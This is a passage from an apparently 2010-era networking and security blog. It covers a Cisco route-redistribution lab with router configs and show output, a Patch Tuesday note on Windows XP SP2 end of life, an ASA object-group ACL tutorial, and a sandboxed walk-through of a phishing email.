    A few things to note here.  Although Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process.  Also note the static route to Null0;  This is a lab after all, instead of having a dummy host on the other side of an interface, I created the static to Null0 so I can have a “live” static route to play with (ie. “redistribute static” under rip)

    R4’s relavant configuration:

    hostname R4
    !
    interface Loopback1
    ip address 199.20.46.1 255.255.254.0
    !
    interface Loopback2
    ip address 198.22.12.1 255.255.254.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.3 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.3
    log-adjacency-changes
    redistribute static subnets
    network 172.19.200.3 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    ip route 198.200.230.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0

    A few things to note here. Much like R3, Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0;

    Ok – Enough configuration.  Let’s look at some show command to verify that the network is up and running as we want and also point out the behavior that needs correcting – to be done in Part 2.


    +++++++ R0
    R0#sh ip bgp summary | b Neigh
    Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
    10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
    R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    Total number of prefixes 4
    R0#sh ip bgp | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.32.27.0/24 10.146.12.3 0 0 65001 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    R0#
    Total number of prefixes 1
    R1#
    R1#sh ip nat statistics
    Total active translations: 0 (0 static, 0 dynamic; 0 extended)
    Outside interfaces:
    FastEthernet1/0
    Inside interfaces:
    FastEthernet0/0
    Hits: 409 Misses: 8
    CEF Translated packets: 181, CEF Punted packets: 16
    Expired translations: 47
    Dynamic mappings:
    -- Inside Source
    [Id: 1] access-list 10 pool OVERLOAD refcount 0
    pool OVERLOAD: netmask 255.255.255.0
    start 172.32.27.100 end 172.32.27.100
    type generic, total addresses 1, allocated 0 (0%), misses 102
    Appl doors: 0
    Normal doors: 0
    Queued Packets: 0
    R1#

    R2#sh ip route eigrp
    172.203.0.0/24 is subnetted, 1 subnets
    D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    172.25.0.0/24 is subnetted, 1 subnets
    D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
    172.32.0.0/24 is subnetted, 1 subnets
    D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
    D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    R2#sh ip route ospf
    O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
    11.0.0.0/32 is subnetted, 1 subnets
    O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    14.0.0.0/32 is subnetted, 1 subnets
    O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    R2#sh ip route rip
    R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
    R2#

    +++++++ R3

    R3#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R3#sh ip rip database
    172.19.0.0/16 auto-summary
    172.19.200.0/24 directly connected, FastEthernet0/0
    222.102.23.0/24 auto-summary
    222.102.23.0/24 redistributed
    [1] via 0.0.0.0,
    R3#

    +++++++ R4

    R4#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R4#

    Below are the relevant out put from R2, which shows that R2 is not using the EIGRP learned routes to 222.102.23.0/24 and 198.200.230.0/24, but is using the OSPF and RIP routes instead.   As mentioned earlier, the requirement for this scenario is that R2 uses the EIGRP routes originated from R0, since they are the primary source.  In Part 2, I’ll go through the configuration added on R2 to make that happen.  If you do have ideas flowing through your head, please feel free to post your comment.

    Until Next Time (AJ)


    R2#sh ip route 222.102.23.1
    Routing entry for 222.102.23.0/24
    Known via "rip", distance 120, metric 1
    Redistributing via rip
    Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
    Routing Descriptor Blocks:
    * 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
    Route metric is 1, traffic share count is 1
    R2#sh ip route 198.200.230.0
    Routing entry for 198.200.230.0/24
    Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
    Redistributing via eigrp 200
    Advertised by eigrp 200 metric 1 1 1 1 1
    Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
    Routing Descriptor Blocks:
    * 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
    Route metric is 20, traffic share count is 1
    R2#sh ip eigrp topology 222.102.23.0/24
    IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
    State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
    Routing Descriptor Blocks:
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#sh ip eigrp topology 198.200.230.0/24
    IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
    State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
    Routing Descriptor Blocks:
    172.19.200.3, from Redistributed, Send flag is 0x0
    Composite metric is (2560000256/0), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 10 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 0
    External data:
    Originating router is 192.168.20.2 (this system)
    AS number of route is 100
    External protocol is OSPF, external metric is 20
    Administrator tag is 0 (0x00000000)
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#

    +++++++ R1
    R1#sh ip route eigrp
    172.19.0.0/24 is subnetted, 1 subnets
    D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    11.0.0.0/32 is subnetted, 1 subnets
    D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    14.0.0.0/32 is subnetted, 1 subnets
    D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 172.32.27.0/24 0.0.0.0 0 32768 i


    +++++++ R2
    Jul 13 2010

    Patch Tuesday & XP SP2 end of life

    In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

    Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

    If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

    So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

    Latest Security Updates

    • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
    • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
    • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
    • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

    Looking forward to seeing what  others might have to say about this.

    References:

    http://www.microsoft.com/security/updates/bulletins/default.aspx

    http://isc.sans.edu/diary.html?storyid=9166&rss

    http://www.microsoft.com/security/updates/bulletins/201007.aspx

    Jul 09 2010

    Cleaning up your access list

    As a Network Admin you would soon realize after a few months of adding various  ACL rules there comes a time when you need to go back and consolidate those rules before it gets out of hand.

    Now that most cloud providers are moving away from the traditional (80, 443) TCP ports and moving towards your none standard (8800, 3995) ports, your job as a Network admin requires you to now plan a bit more.

    Normally if I got a call that a users is unable to access a certain web, I would first verify if its a “URL filtering issue” or a “Firewall” access issue. If I determined that its the latter, I would then write a typical ACL and grant the user access after the requested service has been test.

    For instance if you receive a call about not being able to access a website X on port 5454, you can write a basic ACL rule:

    access-list external_access extended permit tcp 192.168.10.5 255.255.255.0 69.196.224.24 255.255.255.0 eq 5454

    Now the above rule would work just fine, but think about it if you recieve about 10-15 of those request a day, your firewall will be a mess after a while. The way to take care of this is by using Using Network Objects and Groups in a Rule.

    Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or a AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

    Below is how you would accomplish this if you reieved say three request  for web related access all on different ports:

    ======================================
    Creating Object group and adding ports Cisco ASA Firewall
    ======================================

    config t
    object-group service External_Acess tcp
    description Access to external websites
    port-object eq 7778
    port-object eq 5454
    port-object eq 3322

    object-group network External_Access_Users
    description Access to external websites
    network-object host 192.168.10.5
    network-object host 192.168.10.7
    network-object host 192.168.10.9

    =======================================
    Creating ACL and applying object group
    ========================================
    access-list acl_inside remark ***** External  Websites Access *****
    access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Acess

    Now the next time you receive a request for external website access on a none standard port you simply add the port to the service group, and the Host IP to the network access group and you are set. Now that’s much more easy on the eyes to look at!

    If you have another way of achieving the same outcome don’t hesitate to leave a comment, in the end its all about learning.

    Jul 08 2010

    Yet another Phising email

    Today one of our faculty member forward an email to our help-desk and indicated we take a look at it because it might be a phising/spam email, you can only image how happy that made me. Now in the past we have had cases where people would reply to these type of emails and receive more  spam in the process, or worst, “give their credentials away” but that was not the case today.

    Below is an image of the email that was received today.

    Fig-1 Phising Email

    Now the first thing that I found funny about this email is the fact that the phone number for tech support was an IP Address, maybe the overlooked that one or it was done out of humor either way it set off some flags for me and it should for anyone that receives an email like this.

    Once I identified the email as a phising attempt to harvest login credentials I got curious and decided to load Firefox within sandboxie and clicked on the link in the email to see what it would do.

    Fig-2 Firefox Untrusted Error

    Now after clicking on the link in the email I was redirected to www.eformit.com , which triggered a FireFox error because Firefox was unable to confirm that my connection to the site was secure. Since I was in search of seeing where the link would take me I went ahead and added the certificate and continued. In general if you ever get this error you should never add the certificate but instead close out your browser and do some research on the site in question.

    Next I went ahead and examine the server SSL certificate and realized that it expired a few days ago, that’s another reason that would tell me this site was bad business, but since I already knew that I proceeded all the same.

    Fig-3 Expired Cert

    Now on to the next portion of this journey, after clicking on the link I was taken to a website with a very contradictory notice, “we will never send emails to users requesting email account information” however that’s exactly what the page is asking you to type in.

    Fig-4 Credentials harvesting form

    Now lastly after filling in my email and password :), I was redirected to a parking page filled with cheap advertising another sign of trouble.

    Fig-5 Redirected page

    Additional information courtesy of  http://anubis.iseclab.org a very useful source for analyzing uncertain files and URL’s.

    Fig-6 Additional network analysis information

    In the end its always important to train your users to identify what a good or bad email look like and what your network policies are for these type of emails. Also when in doubt load-up your sandbox and have some fun.

    References

    http://scanner.novirusthanks.org/

    http://anubis.iseclab.org

    http://www.sandboxie.com/

    Alibi3col theme by Themocracy

    css.php